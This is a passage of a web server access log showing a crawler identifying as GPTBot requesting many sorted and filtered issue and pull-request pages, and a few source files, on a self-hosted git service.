AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12765] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12375] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:18:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 